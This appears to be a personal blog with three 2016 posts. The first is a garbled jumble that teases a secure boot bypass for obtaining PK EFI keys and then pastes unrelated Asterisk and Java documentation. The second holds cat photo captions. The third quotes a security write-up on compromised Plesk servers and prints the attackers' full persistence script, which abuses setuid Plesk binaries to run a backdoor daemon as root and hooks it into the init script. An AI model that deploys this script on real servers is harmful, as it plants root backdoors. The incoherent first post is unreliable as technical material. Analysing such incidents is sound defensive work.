Monday, August 29, 2016

ShellRoot#suExecute ...what for? for xkeyscore ...

Imagine you're making a secure boot bypass attack...and you want to get PK EFI keys...and you already know that..."Prepending a single _ character to a variables name in Set will cause that variable to be inherited by channels created by the main channel. eg. when using Dial(Local/...); once inherited these variables will not be further inherited. Prepending two _ characters will cause them to be inherited indefinitely.(...) " however this is now, all depends in Javascript...and ..."
Yes all the class hierarchy(same class and all child classes instances) share the same static variable. As the JAVA doesn't support the global variable but you are able to use the static variable as a Global variable without violation of OOP concepts.
If you changed the value of static variable from one of the class, the same changed value replicated to all the classes that uses this variable." so...

java.lang.Object
- java.util.EventObject
- - org.asteriskjava.manager.event.ManagerEvent
  - - org.asteriskjava.manager.event.DtmfEvent

All Implemented Interfaces:: Serializable

public class DtmfEvent
extends ManagerEvent

A DtmfEvent is triggered each time a DTMF digit is sent or received on a channel.

https://maven.reucon.com/projects/public/asterisk-java/1.0.0/apidocs/org/asteriskjava/manager/event/DtmfEvent.html

FIRTS OF ALL LET'S DO THIS TRICK...AS CLEVER WITCHES THEY ARE:

Is it possible to boot Windows 8.1 without its own bootmanager?

http://superuser.com/questions/729264/is-it-possible-to-boot-windows-8-1-without-its-own-bootmanager

Sunday, August 28, 2016

I'm going to leave you 10 bucks, so you can go and buy sunglasses !!

I'm at my working desk!!!

He's relaxing!

Where the hell is Jimmy?

My cat Jimmy David on holidays!

stop the car! I want to watch this!

flush flush cache attack.pdf by Elsa Cristina David on Scribd

Saturday, August 27, 2016

Plesk backdoors, a very large number of servers compromised. (so industrial servers as Siemens??..I heard a story did u herad the same story?

Attackers, using the bug http://kb.parallels.com/en/112303 were able to get access to PLESK installations and install backdoors in the systems. I’m using plural on backdoors, cause it’s not just one, there are quite a few.
In some systems /dev/shm/persist was created with the following code:
# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’
In some cases, this file was hex encoded, in others in plain text form.

http://www.my-audit.gr/hacking/plesk-backdoors-a-very-large-number-of-servers-compromised/

BLACK MASK